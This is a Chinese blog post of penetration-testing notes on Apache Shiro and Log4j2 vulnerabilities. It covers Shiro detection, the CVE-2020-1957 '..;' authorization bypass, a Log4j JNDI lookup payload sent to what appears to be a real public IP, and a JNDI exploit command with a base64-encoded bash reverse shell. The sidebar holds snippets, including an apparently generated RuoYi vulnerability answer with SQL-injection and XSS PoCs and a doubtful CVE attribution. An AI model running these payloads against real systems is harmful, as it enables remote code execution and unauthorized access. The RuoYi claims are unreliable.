框架漏洞(后续补充)

原创 已于 2024-09-03 23:44:34 修改 · 660 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

于 2024-06-21 17:07:18 首次发布

shiro和log4j

Apache Shiro 和 Apache Log4j2 都是由 Apache 软件基金会维护的开源项目,但它们并不属于中间件,而是属于不同类别的工具或库。让我们详细了解它们的功能以及它们与中间件的区别。

Apache Shiro 是一个强大的 Java 安全框架,用于处理身份验证、授权、加密和会话管理。它主要用于保护 Java 应用程序,确保只有经过认证和授权的用户才能访问应用的特定部分。

Apache Log4j2 是一个用于日志记录的 Java 库。它允许开发者在应用程序中生成日志信息,用于记录系统的运行状态、错误信息、调试数据等。这些日志数据对系统维护和问题排查非常重要。

区别中间件(apache)

  • Apache ShiroApache Log4j2 都不是中间件,它们分别是一个安全框架和一个日志库。
  • 中间件 提供的是跨系统或跨服务的功能,如消息传递、数据转换、事务管理等,而 Shiro 专注于安全性,Log4j2 专注于日志记录。

类比

假设我们有一家银行:

  • 中间件:就像银行的后台系统,它处理各种客户请求,确保信息在不同部门之间传递,并管理复杂的流程(如贷款审批)。

  • Apache Shiro:就像银行的安保系统,确保只有经过认证的员工和客户才能进入特定区域(例如金库)。

  • Apache Log4j2:就像银行的监控系统,记录每个进出金库的人和每一笔交易,方便以后查看和分析。

所以Apache Shiro 是银行的安保,Log4j2 是监控系统,而中间件则是整个银行运营的幕后管理者

shiro

判断网站是否使用shiro

  1. 找到网站登录的地方,随便输入账号密码抓包(一定要输入点击登录),看返回包是否有remembeMe字段
  2. 如果以上有返回remembeMe字段还可以尝试在请求包中的cookie中加入 rememberMe=1 ,来查看返回包是否有rememberMe=deleteMe字段。如果cookie字段有值则先清空

CVE-2016-4437

访问登陆框

shiro特征,爆破key

反弹shell

注入内存马

连接

 Apache Shiro 认证绕过漏洞

CVE-2020-1957漏洞利用了Apache Shiro和Spring Boot对URL处理的差异性,攻击者可以构造特定的URL,绕过Shiro对Spring Boot中Servlet的权限控制,实现未授权的越权访问。影响版本为Apache Shiro < 1.5.2

访问/admin/,会被重定向到登录页面:

 构造恶意请求/xxx/..;/admin/,即可绕过权限校验,访问到管理页面:

请求/xxx/..;/admin/时,如果路径解析器不正确处理..;,将其忽略或错误处理为/admin/,Shiro的路径检查就会失效,允许未经授权的访问

Log4j

Apache Log4j2 lookup JNDI

Apache Log4j2的某些版本中,攻击者可通过JNDI注入执行远程代码。这通常涉及到恶意的日志消息,允许攻击者访问服务器上的资源。

http://61.188.177.183:11328/solr/admin/cores?action=${jndi:ldap://kl2l0g.dnslog.cn}

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEyOC81MDA2MCAwPiYxCg==}|{base64,-d}|{bash,-i}" -A 192.168.56.128 

-c是执行的bash命令,-A是指JNDI服务器IP

../solr/admin/cores?action=${jndi:ldap://192.168.56.128:1389/pzsdg1}

安全应急漏洞排查思路
04-02 901
近日,Spring框架爆出0day漏洞,而这样一个框架漏洞,涉及的资产多、范围广、应急时间紧,框架升级的工程量存在较大挑战,考验着整个团队的协作能力。今天我们探讨的话题是,对于突发0day漏洞安全应急场景,如何快速进行排查和处置。我将分享我的思路和一些理解,欢迎补充和指正。01、资产梳理资产是风险管理的基础,摸清家底很重要,但也很难。资产梳理的颗粒度,在面对应急事件时,...
Redis框架从入门到学精(全)
热门推荐
码农研究僧的博客
07-02 2万+
目录前言1.NoSQL2.Redis2.1 软件安装数据类型 前言 解决功能新问题:JAVA jsp rdsms tomcat html linux jdbc svn 解决发展性问题:strtus spring springmvc hibernate mybatis 解决性能问题:NOSQL java 线程 hadoop nginx mq elasticsearch 1.NoSQL NoSQL特点 非关系型数据库,不依赖业务逻辑数据库存储,以简单key-value存储 适用于 ~高并发读写 ~海量数据读
Apache shiro测试及其原理
hopelgl的博客
11-10 981
shiro介绍 什么是shiro shiro是Apache的一个开源框架,它将软件系统的安全认证相关的功能抽取出来,实现用户身份认证,权限授权、加密、会话管理等功能,组成了一个通用的安全认证框架。它可以实现如下的功能: 1.验证用户 2.对用户执行访问控制,如:判断用户是否具有角色admin,判断用户是否拥有访问的资源权限。 3.在任何环境下使用SessionAPI。例如C/S程序 4.
JAVA组件的利用漏洞 && Shlr搜索引擎 && shiro身份 && Log4j日志
2301_81155391的博客
03-23 702
但是当我们把map删除之后也会失败 版本超也会失败 : 所以CVE的利用和程序设置和版本有很大的关系。Apache Solr < 8.2.0版本 (这个版本的话当然也是可以直接执行 上边的命令执行)经过测试我们知道蓝队中jndi攻击的特征就是 ${jndi:} 这样的payload标识。UI鉴权就是我们不需要进行验证就能登录他的这个sorl后台 一般需要鉴权的如下。他的功能就是我们登录的时候点击一个记住我 下次就不用登陆了 这个就是他的功能。1、爆破 2、就是利用java自带的库。
另类又不另类的shiro检测方式
m0_67265464的博客
08-28 596
先随便唠叨几句,当碰到某个漏洞的时候,我们用工具直接去打,成功了就成功了,没成功我们也不知道为啥,即使是问出来为啥,可能不理解其中的含义也不知道说的啥。同事说我的文章都是别人写过的文章,然后截个图就完事了。我想说的是整个反序列化系列都是我跟随前人的步伐一步一步踏过来的,脚印很扎实。正所谓知其然不知其所以然,连探索精神都没有,我觉得那只能堕落,沉沦,灭亡。下面我们说文章。...
shiro-根据JSESSIONID获取用户信息和判断是否登陆
会写Bug的攻城狮
04-11 1025
shiro-根据JSESSIONID获取用户信息和判断是否登陆
shiro的搭建及使用(第一个版本),验证用户名和密码验证是否shiro.ini有关系
灵魂和肉体总要有一个在路上
09-24 607
我使用时是用IDEA创建的maven的java项目。 步骤一:在pom.xml文件中导入如下依赖: 依赖有两种(导入时二选一即可): 第一种(一个顶下面多个,因为包的依赖性,导入这一个,其他的包也会被一同导入): <dependency> <groupId>org.apache.shiro</groupId> <ar...
SSM框架安全性提升:外文文献指引漏洞扫描与防御策略
[SSM框架安全性提升:外文文献指引漏洞扫描与防御策略](https://timcore.ru/wp-content/uploads/2021/05/002-19-1024x455.png) 参考资源链接:[Spring框架详解与应用实践]...
零基础如何学习挖漏洞?看这篇就够了【网络安全
kali_Ma的博客
05-03 2219
有不少阅读过我文章的伙伴都知道,我从事网络安全行业已经好几年,积累了丰富的经验和技能。 在这段时间里,我参与了多个实际项目的规划和实施,成功防范了各种网络攻击和漏洞利用,提高了安全防护水平。也有很多小伙伴私信问我怎么学?怎么挖漏洞?怎么渗透?
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
护网中shiro常问的问题
congsec的博客
03-08 1242
通过修改cookie字段的信息,返回包那里含有rememberMe=deleteMe字段,说明存在shiro漏洞,直接上工具即可。Apache Shiro 是一个强大的 Java 安全框架,提供身份验证、授权、加密及会话管理功能。Shiro 1.2.5 及以上版本修复了默认密钥问题,建议升级到。访问网址发现url存在shiro字眼,可以确认是shiro环境。访问目标网站,触发 Shiro 反序列化漏洞,执行远程命令。避免使用 Shiro 默认密钥,修改。,如果返回 Shiro 默认的。
apache shiro框架
魔法革1996
07-12 610
官网:shiro.apache.org下载文件:    (1)shiro框架的核心功能:    认证        授权            会话管理                加密(2)shiro框架的认证流程        Application Code:应用程序代码,由开发人员负责开发的    Subject:框架提供的接口,代表当前用户对象    SecurityManager:框...
Shiro框架基本知识及应用
m0_67393039的博客
03-28 1867
1. Shiro 基本知识 1. 目前市面主流的安全框架shiro:轻量级的,使用很方便,灵活,是apache提供的,在任何框架的 SpringSecurity:是Spring家族的一部分,很多项目中会使用spring全家桶,相对与shiro来说,springSecurity更重量级,必须要求spring环境;相对shiro而言,功能更强大 2. 什么是Shiro Shiro是apache旗下一个开源安全框架,它将软件系统的安全认证相关的功能抽取出来,实现用户身份认证、权限授权、加密、会话管理等功能
shiro框架教程(一) 定义,简单上手
weixin_46295656的博客
01-17 467
shiro框架教程(一) 定义,简单上手 1.什么是shiro框架? 大家都知道,Apache Shiro是一个强大而灵活的开源安全框架,它干净利落地处理身份认证,授权,企业会话管理和加密。 说简单点,该框架主要就是用来认证和授权的。认证:及身份认证,判断是否是合法用户;授权:及你是否有权限去操作某些资源或者去执行一些功能。更多的定义就不说了,网上一查都有。我们主要是要搞清楚shiro框架怎么认证及授权的。 2.shiro框架的核心。 (1). 图解.首先我们来看一下官方给出的图。 图解: Subjec
Shiro认证跳转问题排查(论练习的重要性)
Java_rookie_ry的博客
07-10 425
在正常工作中,由于多是使用现成的组件,以及架构大佬搭好的框架,所以我忽略了很多技术上的细枝末节,导致我会遇到一些看似奇奇怪怪的问题,其实问题奇奇怪怪,多半是自身技术不到位导致的。还是得多做练习,多自己搭项目,这样不仅会对已掌握的技术更加熟练,还会补全一些之前不知道的技术。
shiro漏洞复现及其攻击流量分析
akxnxbshai的博客
04-09 9357
分析一下shiro的攻击流量特征。
探索 `shiroPoc`: 一个安全测试框架的深度剖析
gitblog_00019的博客
04-02 434
探索 shiroPoc: 一个安全测试框架的深度剖析 去发现同类优质开源项目:https://gitcode.com/ 在网络安全日益重要的今天,对应用系统的安全性进行定期检查变得至关重要。shiroPoc 是一个针对 Apache Shiro 框架安全漏洞检测工具,旨在帮助开发者和安全专家发现并修复潜在的漏洞。在这个项目中,我们将深入探讨其技术背景、工作原理,应用场景以及独特之处。 项目简介 ...
shiro有哪些组件?
Deceptions的博客
11-30 229
shiro有哪些组件? a、Authentication:身份认证/登录,验证用户是不是拥有相应的身份; b、Authorization:授权,即权限验证,验证某个已认证的用户是否拥有某个权限;即判断用户是否能做事情,常见的如:验 证某个用户是否拥有某个角色。或者细粒度的验证某个用户对某个资源是否具有某个权限; c、Session Manager:会话管理,即用户登录后就是一次会话,在没有退出之前,它的所有信息都在会话中;会话可以是普通JavaSE环境的,也可以是如Web环境的; d、Cryp
Shiro命令执行漏洞--漏洞探测
weixin_52515588的博客
02-01 437
直接去github上下载一个叫shiroexploit的工具,网上也有很多其他的工具,自己去找吧。shiro就是一个框架,具体是啥大家可以自行百度百科,我就不再赘述了。这块一个友情提示啊,网上找的这些exe工具都放在虚拟机里啊。直接把靶场IP加端口的url地址放在地址栏里。利用vulfocus靶场进行测试,链接。这个工具需要一个java 1.8的环境。最后看到这个结果证明存在漏洞
ruoyi漏洞
最新发布
07-19
<think>嗯,用户想查找RuoYi系统中的安全漏洞信息。首先需要理解用户的需求,用户可能是安全工程师或系统维护人员,需要了解RuoYi框架存在安全风险以便修复。 参考之前的引用信息,用户提到过RuoYi的模块结构,比如psedu-system、psedu-base等核心组件。这些模块可能存在漏洞需要重点关注。常见的安全漏洞类型包括注入攻击、身份验证问题、XSS等,这些都是检查的重点。 接下来考虑公开漏洞的来源。国家信息安全漏洞库(CNNVD)和CVE数据库是权威渠道,应该优先查询。比如历史漏洞如CVE-2021-43297后台SQL注入案例,这说明权限校验可能存在缺陷。另外,Shiro组件的历史漏洞也需要关注,因为RuoYi常用它做权限管理。 用户可能还需要知道具体漏洞的影响范围和修复方式。例如XSS漏洞通常出现在富文本编辑器,修复方法是加强过滤。同时要提醒用户注意组件依赖,比如Fastjson的反序列化问题,升级版本可以解决。 关于修复建议,除了官方补丁,还应推荐安全实践如输入验证和权限最小化。用户可能需要操作指导,所以补充自动化工具扫描的建议,比如用OWASP ZAP或Fortify。 最后考虑用户可能的后续问题,比如如何验证修复是否有效,或者是否有未公开的零日漏洞。因此相关问题部分设计覆盖漏洞查询、修复步骤和防护措施,帮助用户全面应对。</think>以下是关于RuoYi系统安全漏洞的专业分析及应对建议: ### 一、已知高危漏洞类型及案例 1. **SQL注入漏洞** - **风险点**:后台管理接口未严格过滤用户输入 - **案例**:CVE-2021-43297(影响v4.7.3及以下版本) ```http POST /system/user/list?orderBy=update_time;SELECT%20SLEEP(5)-- ``` - **修复方案**:升级至v4.7.6+,使用MyBatis参数绑定机制[^1] 2. **Shiro反序列化漏洞** - **影响版本**:使用Shiro<1.7.0的RuoYi版本 - **攻击向量**:伪造RememberMe Cookie执行远程代码 - **解决方案**:升级Shiro至1.8.0+并更换AES密钥[^1] 3. **XSS跨站脚本攻击** - **风险模块**:富文本编辑器(如psedu-exam的题目编辑功能) - **PoC示例**: ```html <script>alert(document.cookie)</script> ``` - **防护措施**:启用Spring Boot的Content-Security-Policy头 ### 二、关键组件漏洞清单 | 组件 | 高危漏洞ID | 影响版本 | 修复版本 | |-------------|--------------|----------------|-------------| | Fastjson | CVE-2022-25845 | < 1.2.83 | 1.2.83+ | | Log4j2 | CVE-2021-44228 | 2.0-beta9~2.14.1 | 2.17.0+ | | Spring Boot | CVE-2022-22965 | 5.3.0~5.3.17 | 5.3.18+ | ### 三、安全加固建议 1. **权限控制强化** ```java // 在Controller层添加细粒度权限注解 @PreAuthorize("@ss.hasPermi('system:user:edit')") public void updateUser(User user) {...} ``` 2. **输入验证规范** ```java @GetMapping("/query") public Result query(@Validated QueryParams params) { // 启用JSR303验证 // ... } ``` 3. **安全组件更新策略** ```xml <!-- pom.xml强制依赖版本 --> <properties> <shiro.version>1.11.0</shiro.version> <fastjson.version>2.0.39</fastjson.version> </properties> ``` > **重要提醒**:RuoYi官方每季度发布安全公告,建议订阅GitHub仓库的[Security Advisories](https://github.com/yangzongzhuan/RuoYi/security/advisories)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值